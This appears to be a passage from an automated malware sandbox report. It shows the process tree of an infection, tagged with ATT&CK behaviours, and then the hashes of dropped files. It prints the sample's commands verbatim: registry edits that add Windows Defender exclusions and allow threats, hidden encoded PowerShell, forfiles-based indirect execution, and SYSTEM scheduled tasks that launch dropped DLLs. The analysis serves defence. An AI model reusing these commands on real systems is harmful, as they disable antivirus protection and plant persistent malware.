                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5068
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:512
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KQvfLaYiU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KQvfLaYiU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QnjVuJJvlRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QnjVuJJvlRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZwKxPBnoixvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZwKxPBnoixvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oAFUAAtjhSnSXhroJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oAFUAAtjhSnSXhroJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vLeBJzRGMQgkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vLeBJzRGMQgkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZiQWrnyFBZbLdLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZiQWrnyFBZbLdLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rPyaQcjwumDFKvaxZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rPyaQcjwumDFKvaxZ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QlQFWsVyIPRhNWFc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QlQFWsVyIPRhNWFc\" /t REG_DWORD /d 0 /reg:64;"
                                              2⤵
                                              • Drops file in System32 directory
                                              • System Location Discovery: System Language Discovery
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3532
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KQvfLaYiU" /t REG_DWORD /d 0 /reg:32
                                                3⤵
                                                  PID:4364
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KQvfLaYiU" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:4088
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KQvfLaYiU" /t REG_DWORD /d 0 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2576
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QnjVuJJvlRUn" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3828
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QnjVuJJvlRUn" /t REG_DWORD /d 0 /reg:64
                                                    3⤵
                                                      PID:652
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZwKxPBnoixvU2" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                        PID:3996
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZwKxPBnoixvU2" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5024
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oAFUAAtjhSnSXhroJAR" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                          PID:3868
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oAFUAAtjhSnSXhroJAR" /t REG_DWORD /d 0 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3852
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vLeBJzRGMQgkC" /t REG_DWORD /d 0 /reg:32
                                                          3⤵
                                                            PID:1148
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vLeBJzRGMQgkC" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4192
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZiQWrnyFBZbLdLVB /t REG_DWORD /d 0 /reg:32
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2280
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZiQWrnyFBZbLdLVB /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:484
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                                PID:5080
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4236
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rPyaQcjwumDFKvaxZ /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:812
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rPyaQcjwumDFKvaxZ /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2584
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QlQFWsVyIPRhNWFc /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:4112
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QlQFWsVyIPRhNWFc /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:792
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "ghneaDYOb" /SC once /ST 04:47:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                2⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:4692
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn "ghneaDYOb"
                                                                2⤵
                                                                  PID:3604
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "ghneaDYOb"
                                                                  2⤵
                                                                    PID:2924
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "TIbiROBCMnXznHLdH" /SC once /ST 10:04:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QlQFWsVyIPRhNWFc\THpxPgBxhtzusit\mEeorHN.exe\" bi /JNksdidrW 525403 /S" /V1 /F
                                                                    2⤵
                                                                    • Drops file in Windows directory
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:2480
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /run /I /tn "TIbiROBCMnXznHLdH"
                                                                    2⤵
                                                                      PID:4536
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 520
                                                                      2⤵
                                                                      • Program crash
                                                                      PID:512
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                    1⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3588
                                                                    • C:\Windows\system32\gpupdate.exe
                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                      2⤵
                                                                        PID:1816
                                                                    • \??\c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                      1⤵
                                                                        PID:2100
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                        1⤵
                                                                          PID:1156
                                                                        • \??\c:\windows\system32\gpscript.exe
                                                                          gpscript.exe /RefreshSystemParam
                                                                          1⤵
                                                                            PID:1096
                                                                          • C:\Windows\Temp\QlQFWsVyIPRhNWFc\THpxPgBxhtzusit\mEeorHN.exe
                                                                            C:\Windows\Temp\QlQFWsVyIPRhNWFc\THpxPgBxhtzusit\mEeorHN.exe bi /JNksdidrW 525403 /S
                                                                            1⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Drops Chrome extension
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Program Files directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:4912
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                              2⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1880
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                3⤵
                                                                                • Indirect Command Execution
                                                                                PID:1252
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  4⤵
                                                                                    PID:4464
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:504
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                  3⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4152
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                    4⤵
                                                                                      PID:2816
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:4452
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                      3⤵
                                                                                      • Indirect Command Execution
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1060
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2224
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                          5⤵
                                                                                            PID:4224
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                        3⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:3428
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          4⤵
                                                                                            PID:4216
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                                PID:2476
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            3⤵
                                                                                            • Indirect Command Execution
                                                                                            PID:3828
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              4⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1512
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                5⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2500
                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  6⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1856
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /DELETE /F /TN "bQIvCbfVWxBMfdFfEo"
                                                                                          2⤵
                                                                                            PID:3632
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                            2⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:3832
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              3⤵
                                                                                              • Indirect Command Execution
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3744
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                4⤵
                                                                                                  PID:2328
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                    5⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:828
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:308
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KQvfLaYiU\vrYbLT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "aSDOABRUgNNqdGX" /V1 /F
                                                                                              2⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:1792
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /CREATE /TN "aSDOABRUgNNqdGX2" /F /xml "C:\Program Files (x86)\KQvfLaYiU\wMwThxl.xml" /RU "SYSTEM"
                                                                                              2⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:3532
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /END /TN "aSDOABRUgNNqdGX"
                                                                                              2⤵
                                                                                                PID:4732
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "aSDOABRUgNNqdGX"
                                                                                                2⤵
                                                                                                  PID:168
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "ruBCMeDNvrVuNv" /F /xml "C:\Program Files (x86)\ZwKxPBnoixvU2\fzLnKLq.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1292
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "CAimWIfMWcgSM2" /F /xml "C:\ProgramData\ZiQWrnyFBZbLdLVB\HBoMMUY.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4196
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "tjPuUtYiPDCoZPYuX2" /F /xml "C:\Program Files (x86)\oAFUAAtjhSnSXhroJAR\gocNDzi.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4652
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "moTZPKTaUPqfwqqIDeG2" /F /xml "C:\Program Files (x86)\vLeBJzRGMQgkC\EdEgVPx.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:164
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "eLTRkZdfkFOAzKFoc" /SC once /ST 07:59:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QlQFWsVyIPRhNWFc\HqNxqoUw\YTznMBX.dll\",#1 /uPdidFDPp 525403" /V1 /F
                                                                                                  2⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:3240
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /run /I /tn "eLTRkZdfkFOAzKFoc"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:832
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "TIbiROBCMnXznHLdH"
                                                                                                  2⤵
                                                                                                    PID:2856
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2088
                                                                                                    2⤵
                                                                                                    • Program crash
                                                                                                    PID:4836
                                                                                                • \??\c:\windows\system32\rundll32.EXE
                                                                                                  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\QlQFWsVyIPRhNWFc\HqNxqoUw\YTznMBX.dll",#1 /uPdidFDPp 525403
                                                                                                  1⤵
                                                                                                    PID:1596
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\QlQFWsVyIPRhNWFc\HqNxqoUw\YTznMBX.dll",#1 /uPdidFDPp 525403
                                                                                                      2⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in System32 directory
                                                                                                      • Enumerates system info in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2316
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "eLTRkZdfkFOAzKFoc"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2156

                                                                                                  Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                          Filesize

                                                                                                          129B

                                                                                                          MD5

                                                                                                          a526b9e7c716b3489d8cc062fbce4005

                                                                                                          SHA1

                                                                                                          2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                          SHA256

                                                                                                          e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                          SHA512

                                                                                                          d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                        • C:\Program Files (x86)\KQvfLaYiU\wMwThxl.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          33f5a0911b7cf4eaa7f1fcc92625033f

                                                                                                          SHA1

                                                                                                          f3fd750daefcbb192c9364ebff375bdd09633bcd

                                                                                                          SHA256

                                                                                                          20762660f99c8790b69b8890fe9a5c19ffe1245175fb8667403ecdcd8968e4ce

                                                                                                          SHA512

                                                                                                          d03048cfbda7c75ea5e6dd2ac84e9c1f0e2e755d92f52465c7afef99c6667faa34309a8ab4ba722538a7a9bd01f29dc5078ae586bd5c60cbd1542d336e26b1d4

                                                                                                        • C:\Program Files (x86)\ZwKxPBnoixvU2\fzLnKLq.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          3997ea77524b943407ed15a2ec4c6c1b

                                                                                                          SHA1

                                                                                                          dda98594262b704c37ff42aa36c8b7e9e50eff54

                                                                                                          SHA256

                                                                                                          b5d65b42344f21f6d13a2d87f1949c53e164a81a033929dc36342f3cc2a35ff5

                                                                                                          SHA512

                                                                                                          e2e90f8636c507d01a89959d6cba24bbb13dc4425b946952826fcfa0885167aab3521bb0c305440db434b3ddff894752cb508f24297732d584352edf81bc409b

